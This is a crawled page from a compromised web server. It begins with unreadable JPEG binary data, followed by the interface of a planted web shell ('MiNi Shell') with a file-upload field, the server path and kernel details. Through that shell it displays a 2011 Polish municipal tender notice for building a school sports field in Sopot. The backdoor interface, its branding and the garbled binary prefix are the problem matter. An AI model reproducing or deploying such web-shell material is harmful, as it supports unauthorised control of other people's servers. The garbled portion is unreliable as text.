JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/35710-N-2011.html

<p class="kh_header"><b>Sopot: Przedmiot zamówienia stanowią roboty pod nazwą: Budowa boiska sportowego wielofunkcyjnego z oświetleniem, odwodnieniem oraz częściowym ogrodzeniem przy szkole Podstawowej nr 1 na terenie położonym w Sopocie  ul. Armii Krajowej 50-54, działka  nr 177/7.</b><br>
<b>Numer ogłoszenia: 35710 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Sopotu , ul. Tadeusza Kościuszki 25/27, 81-704 Sopot, woj. pomorskie, tel. 058 5213750, faks 058 5510133.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia stanowią roboty pod nazwą: Budowa boiska sportowego wielofunkcyjnego z oświetleniem, odwodnieniem oraz częściowym ogrodzeniem przy szkole Podstawowej nr 1 na terenie położonym w Sopocie  ul. Armii Krajowej 50-54, działka  nr 177/7..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na zakres robót składają się poniższe zadania:
Roboty rozbiórkowe nawierzchni
Odwodnienie boiska z drenażem
Przebudowa posesyjnej kanalizacji deszczowej
Budowa boiska wielofunkcyjnego z wyposażeniem
Ogrodzenia, piłkochwyty,  ławki, zieleń
Oświetlenie boiska
Monitoring wizyjny

Zakres szczegółowy  zagospodarowania terenu:
Przeznaczenie i program użytkowy
Zostaje utrzymana funkcja i obecny sposób użytkowania działki.
Przedmiotowy projekt boiska sportowego, wielofunkcyjnego, przewiduje budowę boiska do piłki ręcznej oraz dwóch boisk do koszykówki i dwóch do siatkówki, o  nawierzchni poliuretanowej na miejscu istniejącego, asfaltowego boiska do piłki ręcznej, w północnej części działki.
Ze względu na braki i zły stan istniejącego ogrodzenia, a także jego niedostateczną wysokość, dla celów sportowych zaprojektowano wzdłuż granicy północnej i wschodniej (granicy z działkami: 9/10; 9/6;10/4;11/7 i częściowo 192) ogrodzenie panelowe, ocynkowane malowane fabrycznie proszkowo,w kolorze zielonym, np.  RAL 6005, ciągłe o wysokości 4m.  Od strony południowej i zachodniej piłkochwyty, z siatki polipropylenowej (PP), elastycznej  w kolorze zielonym w kolorze producenta, o wysokości 4,0m, wyłapujące piłki. 
Z uwagi na życzenie użytkownika Zamawiający wymaga wykonania od strony północnej /garaże/, na długości 15,0m - za bramką  ogrodzenia o wysokości 6,0m (podwyższenie z 4m do 6m); ogrodzenie panelowe ocynkowane malowane proszkowo, zatrzymujące piłki - pełniące jednocześnie funkcję piłkochwytu, o konstrukcji tłumiącej drgania.
Projekt obejmuje również wykonanie oświetlenia boisk oraz monitoringu przyległego terenu. 

Parametry projektowanych elementów zagospodarowania
-  boisko wielofunkcyjne o wymiarach 32,1x44m będzie miało nawierzchnię poliuretanową na podłożu przepuszczalnym dla wody; powierzchnia boiska (nawierzchni poliuretanowej) - 1412,4 m2
Boisko wielofunkcyjne składać się będzie z:
- boiska do piłki ręcznej o wymiarach 20x40m 
- 2 boisk do piłki koszykowej o wymiarach 15x28m 
- 2 boisk do piłki siatkowej o wymiarach 8x18m 
Boiska ulokowane na jednej płycie, wyróżnione liniami i kolorami. Linie boiska wykonać zgodnie  z obowiązującymi przepisami.

Urządzenia sportowe
Przewiduje się wyposażenie boiska w:
- komplet bramek do piłki ręcznej,
- 2 komplety stojaków do koszykówki z mechanizmem do regulowania wysokości tablic z koszami,
- 1 komplet słupków do piłki siatkowej,
- zadaszoną ławkę dla zawodników długości 5m.
Odwodnienie nawierzchni
Ze względu na zalecenia ujęte w badaniach gruntowych podłoża przewiduje się drenaż rurowy PCV                     w otulinie żwirowej, zbierający wodę z boiska i odprowadzający ją do studni chłonnych z odstojnikami                      i podłączony do kanalizacji deszczowej.
Dodatkowo przewidziano odwodnienie liniowe wzdłuż dłuższych boków boiska.

Ogrodzenie
- Projekt zakłada rozebranie ok. 12m starego ogrodzenia.
- Projektowane ogrodzenie uzupełniające wysokości 4m i długości 91m od strony północnej i wschodniej,       
  z podwyższeniem do wysokości 6m na długości 15m za bramką od strony północnej boiska.
- Projektowany piłkochwyt wysokości 4m, długości ok. 15m za bramką od strony południowej
- Projektowane 2 piłkochwyty wysokości 4m, długości ok. 12,5m za stojakami do koszykówki od strony zachodniej.

Oświetlenie i monitoring
Projektowane oświetlenie składać się będzie z 4 słupów oświetleniowych usytuowanych w narożnikach boiska obejmujących światłem projektowaną płytę boiska, a także istniejące boisko przy budynku szkoły. Do słupów doprowadzona będzie również instalacja monitoringu obejmująca teren projektowanego boiska.
Szczegóły wg opracowania branży elektrycznej.

Ukształtowanie terenu i zieleń
Wzdłuż granicy zachodniej pozostawiony będzie istniejący pas zieleni - trawnik. Nie przewiduje się poza cięciem sanitarnym żadnej wycinki drzew istniejących..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  możliwość udzielenia zamówień uzupełniających  tożsamych z przedmiotem zamówienia,  zgodnie z ustawą Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 20 000,00 PLN, słownie: dwadzieścia tysięcy złotych.
Wadium może być wniesione w jednej lub kilku następujących formach:
-	w pieniądzu przelewem na konto:
                   Konto bankowe: Bank Millennium S.A, nr 93 1160 2202 0000 0000 6194 8083.
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych,
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości                  (t.j. Dz.U. Nr 42 z 2007 r., poz. 275 z późniejszymi zmianami). 
Wadium wnoszone w poręczeniach lub gwarancjach w oryginale należy złożyć w kasie Urzędu Miasta Sopotu ul. Kościuszki 25/27 , pokój nr 4.
Kserokopie dowodu wniesienia wadium należy dołączyć do oferty.
Za wniesienie wadium w formie pieniężnej Zamawiający uważa wadium, które w terminie do dnia  28.03.2011 r.do godz. 12.00  znajdzie się na rachunku Zamawiającego;   podano  w pkt 15.2.
Wadium musi obejmować okres związania ofertą.
Poręczenia bankowe, gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości muszą nieodwołalnie i bezwarunkowo zobowiązywać Poręczyciela lub Gwaranta do zapłaty kwoty pieniężnej w ciągu 14 dni na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych  do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,                  w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania                                    mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie postawiono szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia;
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które będą pełnić funkcje:
a)	kierownika robót budowlanych; kierownik robót branży konstrukcyjno-budowlanej winien posiadać doświadczenie zawodowe min. 5 lat w pełnieniu samodzielnych funkcji technicznych                   w budownictwie oraz wykazać się doświadczeniem w nadzorowaniu lub kierowaniu budową                       co najmniej dwóch boisk o sztucznej nawierzchni o powierzchni min. 1200m2   każde,
b)	kierownika robót sanitarnych; kierownik robót  branży sanitarnej winien posiadać doświadczenie zawodowe min. 3 lata w pełnieniu samodzielnych funkcji technicznych w budownictwie oraz wykazać się doświadczeniem w nadzorowaniu lub kierowaniu robotami w zakresie branży sanitarnej.
c)	kierownika robót elektrycznych;  kierownik robót elektrycznych winien posiadać doświadczenie zawodowe min. 3 lata  w pełnieniu samodzielnych funkcji technicznych  w budownictwie oraz wykazać się doświadczeniem w nadzorowaniu lub kierowaniu robotami w zakresie branży elektrycznej.
Wymagane jest aby osoby te posiadały uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w ww. branżach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj:
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:
-  posiada dostępne środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż  400.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana Umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmiany Umowy w następującym zakresie oraz warunkach:
2.1. W zakresie terminu wykonania Umowy i zgłoszenia odbioru końcowego - wyłącznie na uzasadniony  wniosek Wykonawcy, pod warunkiem, że zmiana ta nie jest przez Wykonawcę zawiniona i wynika wyłącznie z okoliczności, za które Wykonawca nie ponosi odpowiedzialności, a których nie mógł przewidzieć na etapie składania ofert.
2.2. W zakresie terminu wykonania Umowy - wyłącznie na uzasadniony wniosek Wykonawcy wobec wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeśli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia
2.3. Zmiany technologii wykonania przedmiotu zamówienia.
2.4. Wystąpienia konieczności zastosowania robót zamiennych (rozwiązania zamienne).
2.5. W zakresie osób, przedstawionych w załączniku nr 3 do SIWZ, które będą uczestniczyć  w wykonaniu zamówienia - wyłącznie na uzasadniony wniosek Wykonawcy oraz za uprzednio wyrażoną zgodą Zamawiającego, pod warunkiem zastąpienia tych osób osobami spełniającymi warunki podane w załączniku nr 3 do SIWZ.
    2.6. Zmiany istotnych lub pobocznych postanowień Umowy - pod warunkiem zmiany odpowiednich     
   przepisów prawa, których treść oddziałuje pośrednio lub bezpośrednio na te postanowienia Umowy.
2.7. Zmiany istotnych lub pobocznych postanowień umowy - wskutek poprawienia oczywistej omyłki      
pisarskiej lub rachunkowej.
2.8. Zamawiający  przewiduje możliwość zwiększenia wynagrodzenia na skutek robót dodatkowych lub robót zamiennych, których potwierdzona przez Zamawiającego konieczność wystąpi  w trakcie realizacji przedmiotu umowy. 
2.9. Inne, nie ingerujące w treść przedmiotu zamówienia.
3.	W sprawach nieuregulowanych umową mają zastosowanie odpowiednie przepisy ustawy Kodeks cywilny,  przepisy ustawy Prawo budowlane,  przepisy ustawy Prawo Zamówień publicznych.
4.	Ewentualne spory powstałe na tle wykonania obowiązków wynikających z treści Umowy rozstrzygane będą przez sąd powszechny właściwy dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sopot.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 81-704 SOPOT  ul. Kościuszki 25/27   Urząd Miasta Sopotu    Referat Inwestycji IIp. pok. 100.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 12:00, miejsce: 81-704 SOPOT  ul. Kościuszki 25/27   Urząd Miasta Sopotu    Kancelaria Ogólna parter  pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com